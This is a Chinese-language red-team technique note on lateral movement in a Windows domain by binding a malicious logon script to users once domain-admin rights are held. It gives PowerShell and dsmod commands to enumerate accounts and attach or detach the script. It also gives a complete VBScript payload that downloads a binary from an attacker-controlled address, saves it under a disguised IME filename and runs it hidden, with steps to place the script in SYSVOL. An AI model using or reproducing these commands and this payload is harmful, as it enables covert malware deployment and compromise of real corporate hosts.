登录脚本下发
0x1、利用场景
当获取到域控权限或domain admin等高权限时,想横向到域内PC主机上对方开启了防火墙,无法通过445、135进行横向利用,可以通过登录脚本绑定的方式获取目标主机权限。
0x2、利用方法
方法一、powershell win2012及以上自带,获取当前域用户信息
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
绑定指定用户
Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"
解绑
Set-ADUser -Identity zhangsan -ScriptPath " "
方法二、利用dsmod进行绑定
dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"
解绑
dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"
刷新组策略
shell gpupdate /force
VBS内容
strFileURL = "http://192.168.172.129:82/logo.ico"
strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
strComputer = "."
set ws=wscript.createobject("wscript.shell")
val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0)
上传至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目录下,通过方法一或方法二进行绑定后刷新组策略即可
